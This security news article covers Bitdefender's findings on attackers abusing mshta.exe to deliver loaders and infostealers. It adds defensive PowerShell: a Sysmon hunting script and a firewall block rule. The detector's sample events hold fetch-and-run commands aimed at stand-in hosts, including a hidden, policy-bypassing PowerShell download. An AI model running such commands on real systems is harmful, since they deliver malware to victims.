
An ancient Windows utility is giving attackers an almost embarrassingly easy ride: one pasted command or one opened file is enough to kick off an entire infection chain. It’s called MSHTA, and Bitdefender warns it is increasingly abused to deliver data-siphoning malware.
MSHTA (mshta.exe) is a legacy host for HTML Applications, or HTAs, introduced with Internet Explorer 5 in 1999. An HTA is a desktop application written as a web page: HTML for the interface, with VBScript or JScript doing the actual work.
Internet Explorer has since been retired, but mshta.exe still ships with every Windows installation. Unlike a page in a browser tab, an HTA runs with the full privileges of the user who launched it, with unrestricted access to the file system, the network, and scriptable COM objects such as WScript.Shell, and none of a modern browser’s sandboxing applies. Bitdefender, a cybersecurity firm, says the utility is massively abused by attackers.
In recent months, several malicious campaigns have relied on MSHTA to deliver loaders and infostealers or to execute further malicious HTA scripts.
“We noticed an increase in detections of mshta.exe in the execution chain, indicating that it remains a relevant Living-off-the-Land binary even after standalone Internet Explorer was retired,” the report on MSHTA by Bitdefender reads.
ClickFix-style social engineering, where a fake error message or “verify you are human” prompt talks the user into pasting a single command into the Windows Run dialog or a terminal, has become one of the most damaging attack patterns of the moment, and MSHTA serves as a multitool in these attacks: the pasted command is often nothing more than mshta.exe pointed at an attacker-controlled URL.
“It provides attackers with a built-in, Microsoft-signed utility that can retrieve and execute remote script content during the initial or intermediate stages of an infection chain,” Bitdefender explains.
LummaStealer and Amatera, two of the most notorious infostealers, are delivered by the HTA-based CountLoader. The attackers lure users with cracked software and host the malware on legitimate-sounding domain names such as “google-services” or “memory-scanner”; often only the top-level domain, usually .cc, gives away that the site is malicious.
Another campaign uses a multi-stage loader called Emmenhtal Loader, which relies on MSHTA for its early stages: retrieving and launching a remote HTA payload that then unfolds the rest of the infection chain.
Victims, tricked into copying and pasting a script as part of a fake human-verification step in phishing messages on Discord or elsewhere, end up with commodity malware, including information stealers.
ClipBanker, a cryptocurrency-stealing malware that swaps wallet addresses in the victim’s clipboard for the attacker’s own, also relies on MSHTA for early-stage execution.
MSHTA also appears in delivery chains associated with PurpleFox, a long-running and persistent malware family.
“Our telemetry shows multiple smaller clusters of PowerShell executions via MSHTA, where MSHTA creates a wscript shell that runs the PowerShell process to execute the loader responsible for downloading the next stage,” Bitdefender said.
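The two telemetry patterns described above, mshta.exe retrieving remote content and mshta.exe spawning PowerShell through a WScript.Shell object, are straightforward to hunt for in process-creation events. The PowerShell below is an added example written for this article, not code from Bitdefender’s report. It assumes Sysmon process-creation logging (Event ID 1) with its standard EventData field names (Image, CommandLine, ParentImage); the sample events embedded in it are constructed, with reserved example hostnames, so the detection logic can be exercised without live telemetry.

```powershell
# Added example: flag the MSHTA abuse patterns the article describes in
# Sysmon process-creation telemetry (Event ID 1). Not Bitdefender's code.

# Interpreters and LOLBins that mshta.exe has no legitimate reason to spawn.
$ChildInterpreters = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe',
                     'rundll32.exe', 'regsvr32.exe', 'certutil.exe', 'bitsadmin.exe'

function Test-MshtaAbuse {
    # Takes one process-creation record (Sysmon field names) and returns the
    # list of reasons it looks suspicious; an empty result means no hit.
    param([Parameter(Mandatory)][hashtable]$Event)

    $image  = ([IO.Path]::GetFileName([string]$Event.Image)).ToLowerInvariant()
    $parent = ([IO.Path]::GetFileName([string]$Event.ParentImage)).ToLowerInvariant()
    $cmd    = [string]$Event.CommandLine
    $reasons = @()

    if ($image -eq 'mshta.exe') {
        # Remote retrieval: mshta downloads and runs whatever the URL serves.
        if ($cmd -match '\bhttps?://')              { $reasons += 'mshta fetching remote content' }
        # Inline script via a protocol handler: nothing ever touches disk.
        if ($cmd -match '\b(javascript|vbscript|about):') { $reasons += 'mshta running inline script URI' }
        # HTA dropped into a user-writable location rather than an install dir.
        if ($cmd -match '\\(Temp|Downloads|AppData|Public|ProgramData)\\.*\.hta') {
            $reasons += 'mshta running HTA from user-writable path'
        }
        # ClickFix lures end with the user pasting into the Run dialog, so the
        # parent is explorer.exe; only meaningful together with another hit.
        if ($parent -eq 'explorer.exe' -and $reasons.Count -gt 0) { $reasons += 'launched via Explorer/Run dialog' }
    }

    # The WScript.Shell -> PowerShell step shows up as a child of mshta.exe.
    if ($parent -eq 'mshta.exe' -and $ChildInterpreters -contains $image) {
        $reasons += "mshta spawned $image"
    }
    return $reasons
}

function Get-MshtaAbuseFromSysmon {
    # Live hunt: requires Sysmon with process-creation logging enabled.
    param([int]$MaxEvents = 10000)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
    foreach ($ev in (Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop)) {
        $data = @{}
        foreach ($d in ([xml]$ev.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $hits = @(Test-MshtaAbuse -Event $data)
        if ($hits.Count) {
            [pscustomobject]@{
                Time        = $ev.TimeCreated
                Host        = $ev.MachineName
                Reasons     = $hits -join '; '
                CommandLine = $data.CommandLine
                Parent      = $data.ParentCommandLine
            }
        }
    }
}

# Constructed sample records (not real telemetry) covering the three cases:
# a ClickFix-style remote fetch, the mshta -> PowerShell hand-off, and a
# benign legacy HTA that must NOT be flagged.
$SampleEvents = @(
    @{ Image       = 'C:\Windows\System32\mshta.exe'
       ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = 'mshta https://example.invalid/verify.hta' },
    @{ Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       ParentImage = 'C:\Windows\System32\mshta.exe'
       CommandLine = 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/stage2"' },
    @{ Image       = 'C:\Windows\System32\mshta.exe'
       ParentImage = 'C:\Program Files\LegacyApp\legacy.exe'
       CommandLine = '"C:\Program Files\LegacyApp\ui\console.hta"' }
)

foreach ($e in $SampleEvents) {
    $hits = @(Test-MshtaAbuse -Event $e)
    if ($hits.Count) { "SUSPICIOUS  $($e.CommandLine)`n            -> $($hits -join '; ')" }
    else             { "ok          $($e.CommandLine)" }
}
```

Run against the constructed records, the first two events are flagged (remote fetch from the Run dialog; mshta spawning powershell.exe) and the legacy HTA passes clean; call Get-MshtaAbuseFromSysmon on a host with Sysmon to apply the same logic to real events. The benign third case is the reason the rules key on where the HTA comes from and what mshta spawns rather than on mshta.exe alone, which would drown a SOC in the legacy traffic the article mentions.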
Not every use of MSHTA is malicious; older software packages may still depend on it. Bitdefender nonetheless treats the utility as additional attack surface and recommends moving administrative workflows away from MSHTA wherever possible.
“There is currently no public indication that this utility will also be removed from future versions of Windows. As long as it remains available by default, MSHTA remains relevant both as a residual administrative tool and as part of the exposed attack surface.”
Simply removing MSHTA, however, would not stop attacks that depend on user interaction, whether that means persuading victims to download software or media from untrusted sites with the promise of free content or getting them to run a copy-pasted script; the same lure works with any built-in interpreter, PowerShell included.
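Short of removing MSHTA, one attack-surface reduction step that fits the caveat above is to cut mshta.exe off from the network: a pasted “mshta https://…” command then fails at the retrieval stage, while local HTAs that legacy software depends on keep working. The PowerShell below is an added example for this article, not Bitdefender’s recommendation or code; it uses the built-in NetSecurity cmdlets, must run from an elevated shell, and the rule display names are my own choice.

```powershell
# Added example: block outbound network access for every copy of mshta.exe
# with Windows Defender Firewall. Not Bitdefender's code; run elevated.

# Both the native and the 32-bit (SysWOW64) copies exist on 64-bit Windows.
$MshtaPaths = @(
    "$env:SystemRoot\System32\mshta.exe",
    "$env:SystemRoot\SysWOW64\mshta.exe"
)

# Rule display name is a convention chosen for this example.
function Get-MshtaRuleName([string]$Path) { "Block outbound - $Path" }

function Block-MshtaNetwork {
    # Creates one outbound Block rule per existing mshta.exe, idempotently.
    foreach ($path in $MshtaPaths) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $name = Get-MshtaRuleName $path
        if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
            New-NetFirewallRule -DisplayName $name -Direction Outbound -Program $path `
                -Action Block -Profile Any -Enabled True | Out-Null
        }
    }
}

function Test-MshtaNetworkBlocked {
    # $true only if every mshta.exe present has an enabled outbound Block rule.
    foreach ($path in $MshtaPaths) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $rule = Get-NetFirewallRule -DisplayName (Get-MshtaRuleName $path) -ErrorAction SilentlyContinue
        if (-not $rule -or "$($rule.Enabled)" -ne 'True' -or "$($rule.Action)" -ne 'Block') { return $false }
    }
    return $true
}

Block-MshtaNetwork
Test-MshtaNetworkBlocked   # expect True once both rules are in place
```

The limitation is exactly the chain Bitdefender describes: the firewall rule stops mshta.exe itself from reaching out, but an HTA that has already landed on disk can still use WScript.Shell to start PowerShell, which is not blocked. Where MSHTA is genuinely unused, an AppLocker or WDAC deny rule on mshta.exe removes that gap as well; the firewall rule is the compromise for estates that still have legacy HTAs to keep alive.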
“MSHTA-based attacks usually do not rely on a single malicious file, but on a chain of script execution, command-line abuse, in-memory stages, and follow-on payload delivery,” Bitdefender said.
“That is why protection needs to cover multiple points in the attack chain, from attack surface reduction to pre-execution detection and runtime behavioral blocking.”